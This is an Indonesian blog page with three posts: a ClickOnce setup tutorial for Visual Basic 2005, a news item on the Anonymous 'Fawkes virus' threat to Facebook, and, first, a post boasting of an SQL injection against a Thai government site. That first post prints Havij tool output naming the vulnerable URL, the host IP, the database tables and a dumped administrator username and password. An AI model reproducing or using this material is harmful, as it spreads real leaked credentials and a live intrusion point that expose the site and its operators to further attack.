SQL injection on www.ricd.go.th/km

Posted by Light Phantom 20.19, under | 0 komentar


Analyzing http://www.ricd.go.th/km/knowledge2.php?id=56
Host IP: 202.129.32.219
Web Server: Apache
Powered-by: PHP/5.2.17
Keyword Found: ËÑÇ¢éÍ
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 7
Valid String Column is 3
Current DB: km

Count(table_name) of information_schema.tables where table_schema=0x6B6D is 12
Tables found: activity,activity_cate,admin,ccop,cop,cop_cate,informations,km_answer,km_hearsay,km_knowledge,km_knowledge_cate,km_webboard

Count(column_name) of information_schema.columns where table_schema=0x6B6D and table_name=0x61646D696E is 3
Columns found: id,username,password
Count(*) of km.admin is 1
Data Found: id=1
Data Found: username=woon
Data Found: password=1917*09

Tested with : Havij 1.5 Pro
Tested by : Me ( BB )



Cara membuat setup di Visual Basic 2005 Express

Posted by Light Phantom 04.05, under | 2 komentar

              Wah hari ini dingin banget euy , hujan turun satu harian . Nah sesuai judul di atas saya akan memberitahukan cara membuat file setup pada Visual Basic 2005 Express , pasti pada bingung kan , soalnya banyak sekali tutorial yang menyebutkan cara membuat setup nya itu dengan Setup and Deployment , tapi saya bilang itu adalah tutorial yang konyol dan bego , karna Visual Studio 2005 Express tidak menyediakan fitur Setup and Deployment melainkan dengan clickOnce Deployment . Yaudah langsung saja ikuti caranya ya !!!!

1. Di solution Explorer , klik kanan pada nama program kamu .. lalu pilih Publish













2. Setelah Masuk ke menu Publish , pilih lokasi penyimpanan kamu ,,















3. Setelah itu klik next , Pilih ( From a UNC path or file share ) , dan isi specify the UNC path nya dengan : \\bauetest\d$\installer\nama_program_kamu\















4. lalu klik next , pilih Yes, this application is available online or offline














5. Klik Next dan Finnish , selesai deh ...

Buka folder tempat kamu menyimpan aplikasi nya tadi , di situ ada file Setup.exe nya ,



Terakhir tinggal klik install , yah emang sih agak rumit caranya , sebaiknya kalau ingin yang mudah pakai Visual Basic 2010 aja di situ uda include Setup and Deployment ...

Jika anda ingin copy/paste artikel ini tolong sertakan link sumber nya , hargai jerih payah penulis ... Follow blog ini ya .. Terima Kasih

Facebook Terancam Virus Fawkes

Posted by Light Phantom 06.02, under | 0 komentar

HACKTIVIST GROUP Anonymous telah menulis dan mempublikasikan tentang Virus Facebook yang tampaknya berbahaya bagi pengguna dan keamanan data kita. "Anonim # Operasi 'Fawkes Virus'


Video yang menggambarkan bahwa virus menempel di halaman Facebook, mulai mengirimkan link berbahaya dan dapat akses ke account Anda. Setelah itu menggambil kontrol, kemudian mulai membuat permintaan teman dan melompat antara halaman.












Menurut video di atas seorang hacker dapat mengambil alih akun kita hingga mengakses hardisk kita sehingga kita tidak dapat berbuat apa apa dan hampir tidak di ketahui pergerakannya. Walau pun di vidio ini hanya facebook yang menjadi sasaran utama tapi menurut pernyataan hacker, mereka dapat melakukan hal serupa pada semua situs.


Mungkin anda juga merasa berat kita mengakses facebook bukan? oleh karena itu kami harapkan anda bisa berwaspada dan pertebal keamanan data anda. Pada tulisan selanjutnya kami akan melakukan uji coba dengan melakukan test terhadap virus yang dibuat ini dan kami akan tulis cara penanggulangannya. Terimakasih


Sumber : CodeSecurity